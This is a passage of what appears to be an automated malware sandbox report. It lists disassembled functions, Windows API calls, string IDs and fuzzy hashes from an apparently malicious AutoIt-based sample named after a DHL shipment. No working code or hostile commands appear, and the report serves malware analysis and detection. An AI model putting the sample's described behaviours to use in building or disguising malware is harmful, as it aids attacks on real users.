                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: ContainedObject
                                                                                    • String ID: AutoIt3GUI$Container
                                                                                    • API String ID: 3565006973-3941886329
                                                                                    • Opcode ID: 80227accced7b5f3bdb6af9069a5d4437436d58e96b8143a1fb33a29d5d2f4b6
                                                                                    • Instruction ID: de2c92839672147772ea2f0527a511b5f1d5afeb4d284c4b81bd4c9a08b0b267
                                                                                    • Opcode Fuzzy Hash: 80227accced7b5f3bdb6af9069a5d4437436d58e96b8143a1fb33a29d5d2f4b6
                                                                                    • Instruction Fuzzy Hash: A0913670600605AFDB54DF68C884B6ABBF9FF49714F20856EE94ACB3A1DB71E841CB50
                                                                                    Function 0081AFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 007CFC86: _wcscpy.LIBCMT ref: 007CFCA9
                                                                                      • Part of subcall function 007B9837: __itow.LIBCMT ref: 007B9862
                                                                                      • Part of subcall function 007B9837: __swprintf.LIBCMT ref: 007B98AC
                                                                                    • __wcsnicmp.LIBCMT ref: 0081B02D
                                                                                    • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0081B0F6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                    • String ID: LPT
                                                                                    • API String ID: 3222508074-1350329615
                                                                                    • Opcode ID: 627879891e003f8515462e6fb205e1bc0eb8b7bd7ec69b50bc73f8df13193508
                                                                                    • Instruction ID: 55ad417439c731e49394accd6dd39bb556095de7547810bade1cbbac9366565d
                                                                                    • Opcode Fuzzy Hash: 627879891e003f8515462e6fb205e1bc0eb8b7bd7ec69b50bc73f8df13193508
                                                                                    • Instruction Fuzzy Hash: DE614A75A00219EFCB14DB94D895EEEB7B9FF08310F114069F916EB2A1D774AE80CB91
                                                                                    Function 007C2957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • Sleep.KERNEL32(00000000), ref: 007C2968
                                                                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 007C2981
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: GlobalMemorySleepStatus
                                                                                    • String ID: @
                                                                                    • API String ID: 2783356886-2766056989
                                                                                    • Opcode ID: af523975b813e4b3e151e48759dfa4f031f608ea5dbddff707b5d80198200e9c
                                                                                    • Instruction ID: a13c1504c0689b736e06d48cb5fe6c26f3363261457dbef961cf80cb6650f089
                                                                                    • Opcode Fuzzy Hash: af523975b813e4b3e151e48759dfa4f031f608ea5dbddff707b5d80198200e9c
                                                                                    • Instruction Fuzzy Hash: 35515472408744DBD320EF10D88ABEFBBE8FB85345F41885DF2E9411A1DB349569CB66
                                                                                    Function 00819734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 007B4F0B: __fread_nolock.LIBCMT ref: 007B4F29
                                                                                    • _wcscmp.LIBCMT ref: 00819824
                                                                                    • _wcscmp.LIBCMT ref: 00819837
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcscmp$__fread_nolock
                                                                                    • String ID: FILE
                                                                                    • API String ID: 4029003684-3121273764
                                                                                    • Opcode ID: 08f8d289859993fdf1fe64f8f1beb3b6a014dcada18c542a29a6ef4f36aff440
                                                                                    • Instruction ID: f893952a0ac39de2e20539f5d47d625ed846cc88b9edb17d212d0098080bd002
                                                                                    • Opcode Fuzzy Hash: 08f8d289859993fdf1fe64f8f1beb3b6a014dcada18c542a29a6ef4f36aff440
                                                                                    • Instruction Fuzzy Hash: 3841A871A00219BADF219FA4CC59FEFB7BDEF85710F010479F904E7281DA75A9448B61
                                                                                    Function 0082258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 0082259E
                                                                                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 008225D4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: CrackInternet_memset
                                                                                    • String ID: |
                                                                                    • API String ID: 1413715105-2343686810
                                                                                    • Opcode ID: 31bd61843df01399ac433e789669475ceb2e4e7f5aa9d82eabf35850cc32f478
                                                                                    • Instruction ID: 58cb48ae0a50e900d42780db5ed8c31831601cfa3979c7593c1dd5c8be751acb
                                                                                    • Opcode Fuzzy Hash: 31bd61843df01399ac433e789669475ceb2e4e7f5aa9d82eabf35850cc32f478
                                                                                    • Instruction Fuzzy Hash: B0313971800119EBDF05EFA0DC89EEEBFB8FF18310F100069F914A6162EB355956DB60
                                                                                    Function 00837A71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00837B61
                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00837B76
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID: '
                                                                                    • API String ID: 3850602802-1997036262
                                                                                    • Opcode ID: 7c136c05873b7ac22c11d87abd3035281482706dd7198e6ddeb5791f9a4387fa
                                                                                    • Instruction ID: 3361efd29e8b5b402ca8ca9877e30b985cbe28c0bbf98a6abb29237afed21011
                                                                                    • Opcode Fuzzy Hash: 7c136c05873b7ac22c11d87abd3035281482706dd7198e6ddeb5791f9a4387fa
                                                                                    • Instruction Fuzzy Hash: D841FAB4A0521A9FDB24CF64C981BDABBB5FB49314F14016AE904EB391D770E951CF90
                                                                                    Function 00836A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • DestroyWindow.USER32(?,?,?,?), ref: 00836B17
                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00836B53
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$DestroyMove
                                                                                    • String ID: static
                                                                                    • API String ID: 2139405536-2160076837
                                                                                    • Opcode ID: 2ea8b1e2e3ec36b274dcee45275020a9db6d3ac883dc674ac44bdabc8a1b70b3
                                                                                    • Instruction ID: cd27851ff5bb78292c0f31ae0e2cf95da916aed85e0ded641c57c464486d03ed
                                                                                    • Opcode Fuzzy Hash: 2ea8b1e2e3ec36b274dcee45275020a9db6d3ac883dc674ac44bdabc8a1b70b3
                                                                                    • Instruction Fuzzy Hash: CA318171200604AEDB109F68CC41BFB77B9FF88764F10C619FAA5D7191EA35AC91CBA0
                                                                                    Function 008128A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00812911
                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0081294C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: InfoItemMenu_memset
                                                                                    • String ID: 0
                                                                                    • API String ID: 2223754486-4108050209
                                                                                    • Opcode ID: 4efb9f0a66ade3ea85ba8e237d62d96016c49b3d81f26a66ae023541c6a96227
                                                                                    • Instruction ID: 7756aa2d88b9a6dfbe7944454d6e96760e6d21119a8d533ec2c1698780d660ff
                                                                                    • Opcode Fuzzy Hash: 4efb9f0a66ade3ea85ba8e237d62d96016c49b3d81f26a66ae023541c6a96227
                                                                                    • Instruction Fuzzy Hash: 2731AE71A00309ABEB288F5CC885FEEBFBDFF45350F140069E985E61A1D77099A4CB51
                                                                                    Function 008239E9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __snwprintf.LIBCMT ref: 00823A66
                                                                                      • Part of subcall function 007B7DE1: _memmove.LIBCMT ref: 007B7E22
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: __snwprintf_memmove
                                                                                    • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                    • API String ID: 3506404897-2584243854
                                                                                    • Opcode ID: eb7caa90b5cf7a90a0ace08e762a49a92df6de22c3b295a1086332a85ef5246f
                                                                                    • Instruction ID: bc415e627f010cb01228f5afae4e695a94e0a5d2a6abadae9905cc0f38b551da
                                                                                    • Opcode Fuzzy Hash: eb7caa90b5cf7a90a0ace08e762a49a92df6de22c3b295a1086332a85ef5246f
                                                                                    • Instruction Fuzzy Hash: FE218E31700229EACF14EF64DC96AEE77B9FF44300F400469E559EB282DA38EA45CB61
                                                                                    Function 008366D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00836761
                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0083676C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID: Combobox
                                                                                    • API String ID: 3850602802-2096851135
                                                                                    • Opcode ID: ad32f19288fa40ddcb2c50f19ac454f6e8d23f55f52bda3872095e3d870022fb
                                                                                    • Instruction ID: 8db97c2b8d0c70cd37253b03e65468f03c1c045b5133fad46e71c35b8edaaa58
                                                                                    • Opcode Fuzzy Hash: ad32f19288fa40ddcb2c50f19ac454f6e8d23f55f52bda3872095e3d870022fb
                                                                                    • Instruction Fuzzy Hash: 3C119371600208BFEF118F58CC85EAB376AFB843A8F504629F914D7290E6759C6187E0
                                                                                    Function 00836C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 007B1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 007B1D73
                                                                                      • Part of subcall function 007B1D35: GetStockObject.GDI32(00000011), ref: 007B1D87
                                                                                      • Part of subcall function 007B1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 007B1D91
                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00836C71
                                                                                    • GetSysColor.USER32(00000012), ref: 00836C8B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                    • String ID: static
                                                                                    • API String ID: 1983116058-2160076837
                                                                                    • Opcode ID: 15cb1ab992524ecebc7c157139f4badf108aa49c5e382441cf78789864e44038
                                                                                    • Instruction ID: 51f4d6d553f853537cc989ef2e6a5c8667d997f85ba2f13c0346cca9c90f2cbc
                                                                                    • Opcode Fuzzy Hash: 15cb1ab992524ecebc7c157139f4badf108aa49c5e382441cf78789864e44038
                                                                                    • Instruction Fuzzy Hash: 0D212C72910209AFDF04DFA8CC45EFA7BA8FB48314F005629FD55D2251E635E861DBA0
                                                                                    Function 00836920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetWindowTextLengthW.USER32(00000000), ref: 008369A2
                                                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 008369B1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: LengthMessageSendTextWindow
                                                                                    • String ID: edit
                                                                                    • API String ID: 2978978980-2167791130
                                                                                    • Opcode ID: fc9e7e92ab9a748ba20bae1161cc822e9885bc2659555b0fabfebfdc1a1724f0
                                                                                    • Instruction ID: 902834ddb857e9102c759e1f8c76af6af03ab4f57599998697e3365329960ef6
                                                                                    • Opcode Fuzzy Hash: fc9e7e92ab9a748ba20bae1161cc822e9885bc2659555b0fabfebfdc1a1724f0
                                                                                    • Instruction Fuzzy Hash: 6B119D71500108BBEF108E78DC44BEB3B69FB85378F608724FAA4D61E0D635DC6097A0
                                                                                    Function 008129AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00812A22
                                                                                    • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00812A41
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: InfoItemMenu_memset
                                                                                    • String ID: 0
                                                                                    • API String ID: 2223754486-4108050209
                                                                                    • Opcode ID: f060b369a59fe45858ecdd0fd2ec8f55b2126200ef8a77c46b43109d0496b450
                                                                                    • Instruction ID: fd68fa4ad7bf8c30441a35fde7d6e7f77e157423d21752f29ca26c251dd3b723
                                                                                    • Opcode Fuzzy Hash: f060b369a59fe45858ecdd0fd2ec8f55b2126200ef8a77c46b43109d0496b450
                                                                                    • Instruction Fuzzy Hash: F711BE32901128ABCB34DB9CD844BEAB7AEFF45314F044021E95AE7290D770ED9AC791
                                                                                    Function 008221D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0082222C
                                                                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00822255
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Internet$OpenOption
                                                                                    • String ID: <local>
                                                                                    • API String ID: 942729171-4266983199
                                                                                    • Opcode ID: df218d5866de952cf6f37fce25986f5e192c81e29f6888b8e047715f3ff056ee
                                                                                    • Instruction ID: fc66aaf8f68eea554d63de01b5fe08c0dd0f3d56d2ff4005509de0bbbfb84309
                                                                                    • Opcode Fuzzy Hash: df218d5866de952cf6f37fce25986f5e192c81e29f6888b8e047715f3ff056ee
                                                                                    • Instruction Fuzzy Hash: 7D11E070541235FADB288F11AC85EBBFBA8FF16355F10822AFA14C6040D27169D0D6F0
                                                                                    Function 00808E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 007B7DE1: _memmove.LIBCMT ref: 007B7E22
                                                                                      • Part of subcall function 0080AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0080AABC
                                                                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00808E73
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClassMessageNameSend_memmove
                                                                                    • String ID: ComboBox$ListBox
                                                                                    • API String ID: 372448540-1403004172
                                                                                    • Opcode ID: 1bfc724f61522e294b4959ba6819d56e371bd1c9e79d184db638175903141352
                                                                                    • Instruction ID: 9b180401617b275c3154c206491fbdb985c766a4374bc00ed783d6a532c13698
                                                                                    • Opcode Fuzzy Hash: 1bfc724f61522e294b4959ba6819d56e371bd1c9e79d184db638175903141352
                                                                                    • Instruction Fuzzy Hash: BD01F571701228EBCF18EBA4CC469FE7368FF41360B440A19F875A72E2EE355808C650
                                                                                    Function 00818D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: __fread_nolock_memmove
                                                                                    • String ID: EA06
                                                                                    • API String ID: 1988441806-3962188686
                                                                                    • Opcode ID: 260ebbe844e395f80465aff489e1d4b96c3b4c88c0fe644eda9151deb7e11617
                                                                                    • Instruction ID: ab88e606d5b138dc37978bbe2bc5e33686cfd16e3cb9b6e7009b69010e875bdf
                                                                                    • Opcode Fuzzy Hash: 260ebbe844e395f80465aff489e1d4b96c3b4c88c0fe644eda9151deb7e11617
                                                                                    • Instruction Fuzzy Hash: 5501F971804218BFDB18CAA8D81AEEE7BFCDF11301F00419FF552D2281E978E6048BA0
                                                                                    Function 00808CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 007B7DE1: _memmove.LIBCMT ref: 007B7E22
                                                                                      • Part of subcall function 0080AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0080AABC
                                                                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 00808D6B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
